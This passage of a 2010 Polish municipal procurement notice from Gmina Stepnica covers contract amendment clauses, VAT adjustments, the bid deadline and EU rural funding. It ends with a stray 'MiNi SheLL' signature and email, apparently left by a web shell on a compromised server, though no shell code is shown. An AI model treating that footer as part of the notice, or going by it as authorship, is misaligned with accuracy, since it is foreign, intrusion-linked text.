b)	odmienne od przyjętych w dokumentacji projektowej warunki geologiczne (kategorie gruntu, kurzawka, itp.) skutkujące niemożliwością zrealizowania przedmiotu umowy przy dotychczasowych założeniach technologicznych,
c)	odmienne od przyjętych w dokumentacji projektowej warunki terenowe, w szczególności istnienie podziemnych urządzeń, instalacji lub obiektów infrastrukturalnych,
d)	konieczność zrealizowania projektu przy zastosowaniu innych rozwiązań technicznych lub materiałowych ze względu na zmiany obowiązującego prawa .
Zmiany, o których mowa w lit b - c) mogą być wprowadzane w sytuacjach, odpowiadających przesłankom do udzielenia zamówień dodatkowych, oraz w innych sytuacjach, jednakże w tym ostatnim przypadku zamawiający nie zgodzi się na zwiększenie wynagrodzenia, gdy przedmiotem zamówienia jest zaprojektowanie i wykonanie robót budowlanych.
Zmiany wskazywane w lit d) będą wprowadzane wyłącznie w zakresie umożliwiającym oddanie przedmiotu umowy do użytkowania, a Zamawiający może ponieść ryzyko zwiększenia wynagrodzenia z tytułu takich zmian wyłącznie w kwocie równej zwiększonym z tego powodu kosztom. 
Każda ze wskazywanych w lit a - d) zmian może być powiązana z obniżeniem wynagrodzenia na zasadach określonych przez Strony. 

2. Zmiany osobowe:
- zmiana osób, przy pomocy, których Wykonawca realizuje przedmiot umowy na inne legitymujące się co najmniej równoważnymi uprawnieniami i kwalifikacjami, o których mowa w ustawie Prawo budowlane lub innych ustawach, a także SIWZ, będzie wymagała również zaakceptowania przez Zamawiającego.

14.10.3. Pozostałe zmiany:
a) zmiana obowiązującej stawki VAT:
-	jeśli zmiana stawki VAT będzie powodować zwiększenie kosztów wykonania umowy po stronie Wykonawcy, Zamawiający dopuszcza możliwość zwiększenia wynagrodzenia o kwotę równą różnicy w kwocie podatku VAT zapłaconego przez wykonawcę, 
-	jeśli zmiana stawki VAT będzie powodować zmniejszenie kosztów wykonania umowy po stronie Wykonawcy, Zamawiający dopuszcza możliwość zmniejszenia wynagrodzenia o kwotę stanowiącą różnicę kwoty podatku VAT do zapłacenia przez wykonawcę,
b)	rezygnacja przez Zamawiającego z realizacji części przedmiotu umowy. W takim przypadku wynagrodzenie przysługujące wykonawcy zostanie pomniejszone, przy czym Zamawiający zapłaci za wszystkie spełnione świadczenia oraz udokumentowane koszty, które wykonawca poniósł w związku z wynikającymi z umowy planowanymi świadczeniami, 
c)	kolizja z planowanymi lub równolegle prowadzonymi przez inne podmioty inwestycjami. W takim przypadku zmiany w umowie zostaną ograniczone do zmian koniecznych powodujących uniknięcie kolizji, a wynagrodzenie zostanie ustalone z zachowaniem zasady opisanej w lit d),

14.10.4. Wszystkie powyższe postanowienia stanowią katalog zmian, na które Zamawiający może wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody. 

14.10.5. Nie stanowi zmiany umowy w rozumieniu art. 144 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych 
a)	zmiana danych związanych z obsługą administracyjno-organizacyjną Umowy (np. zmiana nr rachunku bankowego), 
b)	zmiany danych teleadresowych, zmiany osób wskazanych do kontaktów między Stronami,
c)	udzielenie zamówień dodatkowych określonych w przepisach o zamówieniach publicznych, 

14.11. Zamawiający zastrzega sobie prawo do odstąpienia od zawarcia umowy w wyjątkowych sytuacjach, zgodnie z art. 145 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.stepnica.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Na wniosek Wykonawcy Specyfikację istotnych warunków zamówienia można uzyskać: 
Po uprzednim powiadomieniu listownie lub faksem. 
Cena 60,00 zł ..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.05.2010 godzina 09:00, miejsce: Gmina Stepnica z siedzibą w Urzędzie Gminy w Stepnicy
 ul. Kościuszki 4
72-112 Stepnica
Pokój nr 6 sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zadanie finansowanie z Programu Rozwoju Obszarów Wiejskich.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com